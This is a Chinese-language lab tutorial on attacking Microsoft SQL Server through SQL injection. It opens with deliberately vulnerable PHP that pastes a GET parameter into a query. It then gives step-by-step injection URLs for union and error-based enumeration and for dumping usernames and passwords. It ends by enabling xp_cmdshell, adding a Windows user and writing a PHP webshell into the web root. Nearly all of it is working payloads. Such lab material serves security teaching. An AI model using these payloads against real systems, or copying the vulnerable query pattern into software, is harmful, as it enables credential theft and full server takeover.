mssql注入实验

连接mssql源码

<?php
    $conn = sqlsrv_connect('localhost',array('Database' => 'test','UID' => 'sa','PWD' => '123.com'));
    if($conn == false){
        var_dump(sqlsrv_errors());
        exit;
        }
    $id = $_GET["id"];
    $sql = "select * from users where id = '$id'";
    $result = sqlsrv_query($conn,$sql);
    var_dump(sqlsrv_errors());
    $row = sqlsrv_fetch_array($result);
    if($row){
        echo "<pre>";
        echo "username:".$row['username'];
        echo "<br>";
        echo "password:".$row['password'];
    }else{
        echo "error";
    }
?>

union联合注入

测注入点

http://192.168.1.102/a.php?id=1' and 1=1-- -

http://192.168.1.102/a.php?id=1' and 1=2-- -

查数据表字段数

http://192.168.1.102/a.php?id=1' order by 3-- -

查看当前数据库用户权限

爆库名

查看当前数据库名称

查询数据库数量

http://192.168.1.102/a.php?id=0' union select null,null,(select count(name) from sys.databases)-- -

查询数据库第一个数据库名称

http://192.168.1.102/a.php?id=0' union select null,null,(select top 1 name from sys.databases)-- -

查询数据库第二个数据库名称

http://192.168.1.102/a.php?id=0' union select null,null,(select top 1 name from sys.databases where name!='master')-- -

查询数据库第三个数据库名称

http://192.168.1.102/a.php?id=0' union select null,null,(select top 1 name from sys.databases where name!='master' and name!='model')-- -

爆表名

查看数据库所有表的数量

查看用户创建表的数量

http://192.168.1.102/a.php?id=0' union select null,null,(select top 1 count(name) from sysobjects where xtype='u')-- -

查看用户创建表的名称

爆字段

查看users表的第一个字段名称

http://192.168.1.102/a.php?id=0' union select null,null,(select top 1 name from syscolumns where id=object_id('users'))-- -

查看users表的第二个字段名称

http://192.168.1.102/a.php?id=0' union select null,null,(select top 1 name from syscolumns where id=object_id('users') and  name!='id')-- -

查看users表的第三个字段名称

http://192.168.1.102/a.php?id=0' union select null,null,(select top 1 name from syscolumns where id=object_id('users') and  name!='id' and name!='username')-- -

拖库

查看users表的第一条数据

http://192.168.1.102/a.php?id=0' union select null,username,password from users-- -

查看users表的第二条数据

http://192.168.1.102/a.php?id=0' union select null,username,password from users where username!='lisi'-- -

 

报错注入

爆库名

http://192.168.1.102/a.php?id=0' and 1=convert(int,(db_name()))-- -

爆表名

http://192.168.1.102/a.php?id=0' and 1=convert(int,(select top 1 name from sys.sysobjects where xtype='u'))-- -

爆字段

http://192.168.1.102/a.php?id=0' and 1=convert(int,(select top 1 name from sys.syscolumns where id=object_id('users')))-- -

拖库

http://192.168.1.102/a.php?id=0' and 1=convert(int,(select top 1 username+'~'+password from users))-- -

 

本地命令执行

开启高级功能，开启xp_cmdshell

use master;

exec sp_configure 'show advanced options',1;

reconfigure;

exec sp_configure 'xp_cmdshell',1;

reconfigure;

执行命令

exec master..xp_cmdshell'whoami';

关闭xp_cmdshell，关闭高级功能

exec sp_configure "xp_cmdshell",0;

reconfigure;

exec sp_configure 'show advanced options',0;

reconfigure;

 

 

远程命令执行

开启高级功能，开启xp_cmdshell

http://192.168.1.102/a.php?id=1';use master;exec sp_configure"show advanced options",1;reconfigure;exec sp_configure"xp_cmdshell",1;reconfigure-- -

远程命令执行，添加用户

http://192.168.1.102/a.php?id=1';exec master..xp_cmdshell"net user hnb 123.com /add"-- -

通过远程命令在服务器主目录下植入木马

http://192.168.1.102/a.php?id=1';exec master..xp_cmdshell"echo ^<?php @assert($_POST[666]) ?^>>C:\phpStudy\PHPTutorial\WWW\\e.php"-- -